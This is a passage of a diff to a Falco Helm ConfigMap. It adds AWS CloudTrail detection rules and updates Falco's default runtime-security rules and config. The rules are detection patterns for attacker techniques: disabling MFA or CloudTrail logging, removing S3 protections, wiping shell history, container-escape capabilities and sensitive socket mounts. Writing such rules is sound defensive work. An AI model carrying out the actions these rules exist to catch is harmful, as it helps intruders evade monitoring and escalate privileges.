1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/falco.pem\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: 'http://falco-sidekick-falcosidekick:2801'\n  user_agent: falcosecurity/falco\n\n\n# Falco supports running a gRPC server with two main binding types\n# 1. Over the network with mandatory mutual TLS authentication (mTLS)\n# 2. 
Over a local unix socket with no authentication\n# By default, the gRPC server is disabled, with no enabled services (see grpc_output)\n# please comment/uncomment and change accordingly the options below to configure it.\n# Important note: if Falco has any troubles creating the gRPC server\n# this information will be logged, however the main Falco daemon will not be stopped.\n# gRPC server over network with (mandatory) mutual TLS configuration.\n# This gRPC server is secure by default so you need to generate certificates and update their paths here.\n# By default the gRPC server is off.\n# You can configure the address to bind and expose it.\n# By modifying the threadiness configuration you can fine-tune the number of threads (and context) it will use.\n# grpc:\n#   enabled: true\n#   bind_address: \"0.0.0.0:5060\"\n#   # when threadiness is 0, Falco sets it by automatically figuring out the number of online cores\n#   threadiness: 0\n#   private_key: \"/etc/falco/certs/server.key\"\n#   cert_chain: \"/etc/falco/certs/server.crt\"\n#   root_certs: \"/etc/falco/certs/ca.crt\"\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\n# gRPC output service.\n# By default it is off.\n# By enabling this all the output events will be kept in memory until you read them with a gRPC client.\n# Make sure to have a consumer for them or leave this disabled.\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
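The `outputs: rate / max_burst` throttle described in the config comments above is a classic token bucket. A minimal Python sketch of that mechanism, as an illustration of the technique only (this is not Falco's actual implementation):

```python
import time

class TokenBucket:
    """Token bucket: gain `rate` tokens per second, capped at `max_burst`.

    Each notification sent costs one token; the bucket starts full, so an
    initial burst of up to `max_burst` notifications is allowed.
    """

    def __init__(self, rate=1.0, max_burst=1000):
        self.rate = rate
        self.max_burst = max_burst
        self.tokens = float(max_burst)
        self.last = time.monotonic()

    def allow(self, now=None):
        """Return True if a notification may be sent now, consuming a token."""
        if now is None:
            now = time.monotonic()
        # Refill proportionally to elapsed time, never exceeding max_burst.
        self.tokens = min(self.max_burst,
                          self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False
```

With the defaults (`rate: 1`, `max_burst: 1000`), a quiet system can emit up to 1000 notifications in a burst and then roughly one per second, regaining the full burst after 1000 seconds of inactivity.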
   application_rules.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -343,6 +343,447 @@
     #   condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
     #   output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
     #   priority: WARNING
+  aws_cloudtrail_rules.yaml: |+
+    #
+    # Copyright (C) 2022 The Falco Authors.
+    #
+    #
+    # Licensed under the Apache License, Version 2.0 (the "License");
+    # you may not use this file except in compliance with the License.
+    # You may obtain a copy of the License at
+    #
+    #     http://www.apache.org/licenses/LICENSE-2.0
+    #
+    # Unless required by applicable law or agreed to in writing, software
+    # distributed under the License is distributed on an "AS IS" BASIS,
+    # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+    # See the License for the specific language governing permissions and
+    # limitations under the License.
+    #
+
+    # All rules files related to plugins should require at least engine version 10
+    - required_engine_version: 10
+
+    - required_plugin_versions:
+      - name: cloudtrail
+        version: 0.2.3
+      - name: json
+        version: 0.2.2
+
+    # Note that this rule is disabled by default. It's useful only to
+    # verify that the cloudtrail plugin is sending events properly.  The
+    # very broad condition evt.num > 0 only works because the rule source
+    # is limited to aws_cloudtrail. This ensures that the only events that
+    # are matched against the rule are from the cloudtrail plugin (or
+    # a different plugin with the same source).
+    - rule: All Cloudtrail Events
+      desc: Match all cloudtrail events.
+      condition:
+        evt.num > 0
+      output: Some Cloudtrail Event (evtnum=%evt.num info=%evt.plugininfo ts=%evt.time.iso8601 id=%ct.id error=%ct.error)
+      priority: DEBUG
+      tags:
+      - cloud
+      - aws
+      source: aws_cloudtrail
+      enabled: false
+
+    - rule: Console Login Through Assume Role
+      desc: Detect a console login through Assume Role.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+      output:
+        Detected a console login through Assume Role
+        (principal=%ct.user.principalid,
+        assumedRole=%ct.user.arn,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region)
+      priority: WARNING
+      tags:
+      - cloud
+      - aws
+      - aws_console
+      - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Login Without MFA
+      desc: Detect a console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and json.value[/additionalEventData/MFAUsed]="No"
+      output:
+        Detected a console login without MFA
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
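The `json.value[...]` fields in the conditions above address the raw CloudTrail record with JSON-Pointer-style paths. A hedged Python sketch of that lookup against a made-up, minimal record (the record contents are illustrative, not a complete CloudTrail event):

```python
import json

def json_pointer(doc, pointer):
    """Resolve a JSON-Pointer-style path such as /additionalEventData/MFAUsed.

    Numeric path segments index into lists, as in /items/0/instanceId.
    """
    node = doc
    for part in pointer.strip("/").split("/"):
        node = node[int(part)] if isinstance(node, list) else node[part]
    return node

# Made-up, minimal CloudTrail-like record (illustrative only).
event = json.loads("""
{
  "eventName": "ConsoleLogin",
  "additionalEventData": {"MFAUsed": "No"},
  "responseElements": {"ConsoleLogin": "Success"}
}
""")

# Mirrors the rule's condition: a successful console login without MFA.
no_mfa_login = (
    event["eventName"] == "ConsoleLogin"
    and json_pointer(event, "/responseElements/ConsoleLogin") == "Success"
    and json_pointer(event, "/additionalEventData/MFAUsed") == "No"
)
```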
+
+    - rule: Console Root Login Without MFA
+      desc: Detect root console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and json.value[/additionalEventData/MFAUsed]="No"
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and ct.user.identitytype="Root"
+      output:
+        Detected a root console login without MFA.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Deactivate MFA for Root User
+      desc: Detect deactivating MFA configuration for root.
+      condition:
+        ct.name="DeactivateMFADevice" and not ct.error exists
+        and ct.user.identitytype="Root"
+        and ct.request.username="AWS ROOT USER"
+      output:
+        Multi Factor Authentication configuration has been disabled for root
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         MFA serial number=%ct.request.serialnumber)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create AWS user
+      desc: Detect creation of a new AWS user.
+      condition:
+        ct.name="CreateUser" and not ct.error exists
+      output:
+        A new AWS user has been created
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         new user created=%ct.request.username)
+      priority: INFO
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create Group
+      desc: Detect creation of a new user group.
+      condition:
+        ct.name="CreateGroup" and not ct.error exists
+      output:
+        A new user group has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Delete Group
+      desc: Detect deletion of a user group.
+      condition:
+        ct.name="DeleteGroup" and not ct.error exists
+      output:
+        A user group has been deleted.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: ECS Service Created
+      desc: Detect creation of a new service in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        ct.name="CreateService" and
+        not ct.error exists
+      output:
+        A new service has been created in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        service name=%ct.request.servicename,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: ECS Task Run or Started
+      desc: Detect starting of a new task in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        (ct.name="RunTask" or ct.name="StartTask") and
+        not ct.error exists
+      output:
+        A new task has been started in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: Create Lambda Function
+      desc: Detect creation of a Lambda function.
+      condition:
+        ct.name="CreateFunction20150331" and not ct.error exists
+      output:
+        Lambda function has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Code
+      desc: Detect updates to a Lambda function code.
+      condition:
+        ct.name="UpdateFunctionCode20150331v2" and not ct.error exists
+      output:
+        The code of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Configuration
+      desc: Detect updates to a Lambda function configuration.
+      condition:
+        ct.name="UpdateFunctionConfiguration20150331v2" and not ct.error exists
+      output:
+        The configuration of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Run Instances
+      desc: Detect launching of a specified number of instances.
+      condition:
+        ct.name="RunInstances" and not ct.error exists
+      output:
+        A number of instances have been launched.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    # Only instances launched on regions in this list are approved.
+    - list: approved_regions
+      items:
+        - us-east-0
+
+    - rule: Run Instances in Non-approved Region
+      desc: Detect launching of a specified number of instances in a non-approved region.
+      condition:
+        ct.name="RunInstances" and not ct.error exists and
+        not ct.region in (approved_regions)
+      output:
+        A number of instances have been launched in a non-approved region.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid,
+         image id=%json.value[/responseElements/instancesSet/items/0/instanceId])
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
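The `approved_regions` list above is a plain membership allowlist. A hedged Python equivalent of the rule's logic (the region names are illustrative — `us-east-0`, as in the list above, is deliberately not a real AWS region):

```python
# Mirrors the approved_regions list above; us-east-0 is a placeholder, not real.
APPROVED_REGIONS = {"us-east-0"}

def run_instances_outside_approved(event_name, error, region):
    """True when a successful RunInstances call targets a non-approved region."""
    return (event_name == "RunInstances"
            and error is None
            and region not in APPROVED_REGIONS)
```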
+
+    - rule: Delete Bucket Encryption
+      desc: Detect deleting configuration to use encryption for bucket storage.
+      condition:
+        ct.name="DeleteBucketEncryption" and not ct.error exists
+      output:
+        An encryption configuration for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Public Access Block
+      desc: Detect disabling of the public access block on a bucket.
+      condition:
+        ct.name="PutBucketPublicAccessBlock" and not ct.error exists and
+        json.value[/requestParameters/publicAccessBlock]="" and
+          (json.value[/requestParameters/PublicAccessBlockConfiguration/RestrictPublicBuckets]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicPolicy]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicAcls]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/IgnorePublicAcls]=false)
+      output:
+        A public access block for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: List Buckets
+      desc: Detect listing of all S3 buckets.
+      condition:
+        ct.name="ListBuckets" and not ct.error exists
+      output:
+        A list of all S3 buckets has been requested.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         host=%ct.request.host)
+      priority: WARNING
+      enabled: false
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket ACL
+      desc: Detect setting the permissions on an existing bucket using access control lists.
+      condition:
+        ct.name="PutBucketAcl" and not ct.error exists
+      output:
+        The permissions on an existing bucket have been set using access control lists.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket Policy
+      desc: Detect applying an Amazon S3 bucket policy to an Amazon S3 bucket.
+      condition:
+        ct.name="PutBucketPolicy" and not ct.error exists
+      output:
+        An Amazon S3 bucket policy has been applied to an Amazon S3 bucket.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket,
+         policy=%ct.request.policy)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Trail Created
+      desc: Detect creation of a new trail.
+      condition:
+        ct.name="CreateTrail" and not ct.error exists
+      output:
+        A new trail has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         trail name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Logging Disabled
+      desc: CloudTrail logging has been disabled; this could potentially be malicious.
+      condition:
+        ct.name="StopLogging" and not ct.error exists
+      output:
+        The CloudTrail logging has been disabled.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         resource name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
   falco_rules.local.yaml: |
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -376,7 +817,7 @@
     # Or override/append to any rule, macro, or list from the Default Rules
   falco_rules.yaml: |
     #
-    # Copyright (C) 2020 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -406,13 +847,13 @@
     #   condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory))
 
     - macro: open_write
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_read
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_directory
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
 
     - macro: never_true
       condition: (evt.num=0)
@@ -440,11 +881,14 @@
       condition: rename or remove
 
     - macro: spawned_process
-      condition: evt.type = execve and evt.dir=<
+      condition: evt.type in (execve, execveat) and evt.dir=<
 
     - macro: create_symlink
       condition: evt.type in (symlink, symlinkat) and evt.dir=<
 
+    - macro: create_hardlink
+      condition: evt.type in (link, linkat) and evt.dir=<
+
     - macro: chmod
       condition: (evt.type in (chmod, fchmod, fchmodat) and evt.dir=<)
 
@@ -593,13 +1037,13 @@
     - list: deb_binaries
       items: [dpkg, dpkg-preconfigu, dpkg-reconfigur, dpkg-divert, apt, apt-get, aptitude,
         frontend, preinst, add-apt-reposit, apt-auto-remova, apt-key,
-        apt-listchanges, unattended-upgr, apt-add-reposit, apt-config, apt-cache, apt.systemd.dai
+        apt-listchanges, unattended-upgr, apt-add-reposit, apt-cache, apt.systemd.dai
         ]
 
     # The truncated dpkg-preconfigu is intentional, process names are
-    # truncated at the sysdig level.
+    # truncated at the falcosecurity-libs level.
     - list: package_mgmt_binaries
-      items: [rpm_binaries, deb_binaries, update-alternat, gem, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
+      items: [rpm_binaries, deb_binaries, update-alternat, gem, npm, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
 
     - macro: package_mgmt_procs
       condition: proc.name in (package_mgmt_binaries)
@@ -710,7 +1154,7 @@
     # for efficiency.
     - macro: inbound_outbound
       condition: >
-        ((((evt.type in (accept,listen,connect) and evt.dir=<)) or
+        ((((evt.type in (accept,listen,connect) and evt.dir=<)) and
          (fd.typechar = 4 or fd.typechar = 6)) and
          (fd.ip != "0.0.0.0" and fd.net != "127.0.0.0/8") and
          (evt.rawres >= 0 or evt.res = EINPROGRESS))
@@ -817,6 +1261,9 @@
     - list: shell_config_directories
       items: [/etc/zsh]
 
+    - macro: user_known_shell_config_modifiers
+      condition: (never_true)
+
     - rule: Modify Shell Configuration File
       desc: Detect attempt to modify shell configuration files
       condition: >
@@ -826,6 +1273,7 @@
          fd.directory in (shell_config_directories))
         and not proc.name in (shell_binaries)
         and not exe_running_docker_save
+        and not user_known_shell_config_modifiers
       output: >
         a shell configuration file has been modified (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline pcmdline=%proc.pcmdline file=%fd.name container_id=%container.id image=%container.image.repository)
       priority:
@@ -938,7 +1386,7 @@
 
     # Qualys seems to run a variety of shell subprocesses, at various
     # levels. This checks at a few levels without the cost of a full
-    # proc.aname, which traverses the full parent heirarchy.
+    # proc.aname, which traverses the full parent hierarchy.
     - macro: run_by_qualys
       condition: >
         (proc.pname=qualys-cloud-ag or
@@ -1149,6 +1597,9 @@
     - macro: centrify_writing_krb
       condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5)
 
+    - macro: sssd_writing_krb
+      condition: (proc.name=adcli and proc.aname[2]=sssd and fd.name startswith /etc/krb5)
+
     - macro: cockpit_writing_conf
       condition: >
         ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la)
@@ -1477,7 +1928,7 @@
       condition: (proc.name=oc and fd.name startswith /etc/origin/node)
 
     - macro: keepalived_writing_conf
-      condition: (proc.name=keepalived and fd.name=/etc/keepalived/keepalived.conf)
+      condition: (proc.name in (keepalived, kube-keepalived) and fd.name=/etc/keepalived/keepalived.conf)
 
     - macro: etcd_manager_updating_dns
       condition: (container and proc.name=etcd-manager and fd.name=/etc/hosts)
@@ -1592,6 +2043,7 @@
         and not nginx_writing_certs
         and not chef_client_writing_conf
         and not centrify_writing_krb
+        and not sssd_writing_krb
         and not cockpit_writing_conf
         and not ipsec_writing_conf
         and not httpd_writing_ssl_conf
@@ -2181,7 +2633,7 @@
               registry.access.redhat.com/sematext/agent,
               registry.access.redhat.com/sematext/logagent]
 
-    # These container images are allowed to run with --privileged
+    # These container images are allowed to run with --privileged and full set of capabilities
     - list: falco_privileged_images
       items: [
         docker.io/calico/node,
@@ -2199,10 +2651,12 @@
         gke.gcr.io/kube-proxy,
         gke.gcr.io/gke-metadata-server,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         gcr.io/google-containers/prometheus-to-sd,
         k8s.gcr.io/ip-masq-agent-amd64,
         k8s.gcr.io/kube-proxy,
         k8s.gcr.io/prometheus-to-sd,
+        public.ecr.aws/falcosecurity/falco,
         quay.io/calico/node,
         sysdig/sysdig,
         sematext_images
@@ -2231,7 +2685,7 @@
     - list: falco_sensitive_mount_images
       items: [
         docker.io/sysdig/sysdig, sysdig/sysdig,
-        docker.io/falcosecurity/falco, falcosecurity/falco,
+        docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco,
         gcr.io/google_containers/hyperkube,
         gcr.io/google_containers/kube-proxy, docker.io/calico/node,
         docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/consul,
@@ -2247,19 +2701,6 @@
                   container.image.repository in (falco_sensitive_mount_images) or
                   container.image.repository startswith quay.io/sysdig/)
 
-    # These container images are allowed to run with hostnetwork=true
-    - list: falco_hostnetwork_images
-      items: [
-        gcr.io/google-containers/prometheus-to-sd,
-        gcr.io/projectcalico-org/typha,
-        gcr.io/projectcalico-org/node,
-        gke.gcr.io/gke-metadata-server,
-        gke.gcr.io/kube-proxy,
-        gke.gcr.io/netd-amd64,
-        k8s.gcr.io/ip-masq-agent-amd64
-        k8s.gcr.io/prometheus-to-sd,
-        ]
-
     # Add conditions to this macro (probably in a separate file,
     # overwriting this macro) to specify additional containers that are
     # allowed to perform sensitive mounts.
@@ -2280,14 +2721,40 @@
       priority: INFO
       tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
 
+    # These capabilities were used in the past to escape from containers
+    - macro: excessively_capable_container
+      condition: >
+        (thread.cap_permitted contains CAP_SYS_ADMIN
+        or thread.cap_permitted contains CAP_SYS_MODULE
+        or thread.cap_permitted contains CAP_SYS_RAWIO
+        or thread.cap_permitted contains CAP_SYS_PTRACE
+        or thread.cap_permitted contains CAP_SYS_BOOT
+        or thread.cap_permitted contains CAP_SYSLOG
+        or thread.cap_permitted contains CAP_DAC_READ_SEARCH
+        or thread.cap_permitted contains CAP_NET_ADMIN
+        or thread.cap_permitted contains CAP_BPF)
+
+    - rule: Launch Excessively Capable Container
+      desc: Detect a container started with a powerful set of capabilities. Exceptions are made for known trusted images.
+      condition: >
+        container_started and container
+        and excessively_capable_container
+        and not falco_privileged_containers
+        and not user_privileged_containers
+      output: Excessively capable container started (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag cap_permitted=%thread.cap_permitted)
+      priority: INFO
+      tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
+
+
     # For now, only considering a full mount of /etc as
     # sensitive. Ideally, this would also consider all subdirectories
-    # below /etc as well, but the globbing mechanism used by sysdig
+    # below /etc as well, but the globbing mechanism
     # doesn't allow exclusions of a full pattern, only single characters.
     - macro: sensitive_mount
       condition: (container.mount.dest[/proc*] != "N/A" or
                   container.mount.dest[/var/run/docker.sock] != "N/A" or
                   container.mount.dest[/var/run/crio/crio.sock] != "N/A" or
+                  container.mount.dest[/run/containerd/containerd.sock] != "N/A" or
                   container.mount.dest[/var/lib/kubelet] != "N/A" or
                   container.mount.dest[/var/lib/kubelet/pki] != "N/A" or
                   container.mount.dest[/] != "N/A" or
@@ -2415,7 +2882,8 @@
         '"sh -c  -t -i"',
         '"sh -c openssl version"',
         '"bash -c id -Gn kafadmin"',
-        '"sh -c /bin/sh -c ''date +%%s''"'
+        '"sh -c /bin/sh -c ''date +%%s''"',
+        '"sh -c /usr/share/lighttpd/create-mime.conf.pl"'
         ]
 
     # This list allows for easy additions to the set of commands allowed
@@ -2574,7 +3042,7 @@
     #   output: "sshd sent error message to syslog (error=%evt.buffer)"
     #   priority: WARNING
 
-    - macro: somebody_becoming_themself
+    - macro: somebody_becoming_themselves
       condition: ((user.name=nobody and evt.arg.uid=nobody) or
                   (user.name=www-data and evt.arg.uid=www-data) or
                   (user.name=_apt and evt.arg.uid=_apt) or
@@ -2612,7 +3080,7 @@
         evt.type=setuid and evt.dir=>
         and (known_user_in_container or not container)
         and not (user.name=root or user.uid=0)
-        and not somebody_becoming_themself
+        and not somebody_becoming_themselves
         and not proc.name in (known_setuid_binaries, userexec_binaries, mail_binaries, docker_binaries,
                               nomachine_binaries)
         and not proc.name startswith "runc:"
@@ -2636,7 +3104,7 @@
         activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded.
         Activity in containers is also excluded--some containers create custom users on top
         of a base linux distribution at startup.
-        Some innocuous commandlines that don't actually change anything are excluded.
+        Some innocuous command lines that don't actually change anything are excluded.
       condition: >
         spawned_process and proc.name in (user_mgmt_binaries) and
         not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and
@@ -2672,7 +3140,7 @@
      desc: Detect creation of files below /dev by programs other than known device-management binaries. Some rootkits hide files in /dev.
       condition: >
         fd.directory = /dev and
-        (evt.type = creat or ((evt.type = open or evt.type = openat) and evt.arg.flags contains O_CREAT))
+        (evt.type = creat or (evt.type in (open,openat,openat2) and evt.arg.flags contains O_CREAT))
         and not proc.name in (dev_creation_binaries)
         and not fd.name in (allowed_dev_files)
         and not fd.name startswith /dev/tty
@@ -2686,7 +3154,7 @@
     # explicitly enumerate the container images that you want to allow
     # access to EC2 metadata. In this main falco rules file, there isn't
     # any way to know all the containers that should have access, so any
-    # container is alllowed, by repeating the "container" macro. In the
+    # container is allowed, by repeating the "container" macro. In the
     # overridden macro, the condition would look something like
     # (container.image.repository = vendor/container-1 or
     # container.image.repository = vendor/container-2 or ...)
@@ -2740,7 +3208,8 @@
          docker.io/sysdig/sysdig, docker.io/falcosecurity/falco,
          sysdig/sysdig, falcosecurity/falco,
          fluent/fluentd-kubernetes-daemonset, prom/prometheus,
-         ibm_cloud_containers)
+         ibm_cloud_containers,
+         public.ecr.aws/falcosecurity/falco)
          or (k8s.ns.name = "kube-system"))
 
     - macro: k8s_api_server
@@ -2944,27 +3413,29 @@
         WARNING
       tags: [process, mitre_persistence]
 
+    # note: `endswith "ash_history"` matches both `bash_history` and `ash_history`
     - macro: modify_shell_history
       condition: >
         (modify and (
-          evt.arg.name contains "bash_history" or
-          evt.arg.name contains "zsh_history" or
+          evt.arg.name endswith "ash_history" or
+          evt.arg.name endswith "zsh_history" or
           evt.arg.name contains "fish_read_history" or
           evt.arg.name endswith "fish_history" or
-          evt.arg.oldpath contains "bash_history" or
-          evt.arg.oldpath contains "zsh_history" or
+          evt.arg.oldpath endswith "ash_history" or
+          evt.arg.oldpath endswith "zsh_history" or
           evt.arg.oldpath contains "fish_read_history" or
           evt.arg.oldpath endswith "fish_history" or
-          evt.arg.path contains "bash_history" or
-          evt.arg.path contains "zsh_history" or
+          evt.arg.path endswith "ash_history" or
+          evt.arg.path endswith "zsh_history" or
           evt.arg.path contains "fish_read_history" or
           evt.arg.path endswith "fish_history"))
 
+    # note: `endswith "ash_history"` matches both `bash_history` and `ash_history`
     - macro: truncate_shell_history
       condition: >
         (open_write and (
-          fd.name contains "bash_history" or
-          fd.name contains "zsh_history" or
+          fd.name endswith "ash_history" or
+          fd.name endswith "zsh_history" or
           fd.name contains "fish_read_history" or
           fd.name endswith "fish_history") and evt.arg.flags contains "O_TRUNC")
 
@@ -3003,7 +3474,7 @@
       items: [hyperkube, kubelet, k3s-agent]
 
     # This macro should be overridden in user rules as needed. This is useful if a given application
-    # should not be ignored alltogether with the user_known_chmod_applications list, but only in
